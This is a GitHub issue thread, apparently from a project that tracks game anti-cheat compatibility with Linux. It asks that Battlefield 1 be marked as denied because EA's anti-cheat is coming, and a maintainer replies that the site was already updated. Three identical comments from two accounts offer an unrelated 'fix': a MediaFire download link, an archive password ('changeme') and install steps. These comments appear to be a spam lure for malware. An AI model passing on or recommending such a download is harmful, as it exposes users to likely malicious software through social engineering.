### ISSUE TITLE
Update Battlefield 1

### ISSUE THREAD

**Issue by Tiagoquix** [AreWeAntiCheatYet/AreWeAntiCheatYet#1717]
### Game Title

Battlefield 1

### Status of the Anti-Cheat

🚫 Denied

### Tinkering Steps

EA anti-cheat is coming

### Proof of Mention

https://www.ea.com/games/battlefield/battlefield-2042/news/eaac-and-battlefield (post updated with BF1 added) / also see https://steamdb.info/app/1238840/history/?changeid=24893979

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Schutzend** [comment]
@Starz0r Same here

**Comment by Starz0r** [comment]
We already had a PR for it, and by the time this issue was made, the changes were already reflected on the site.
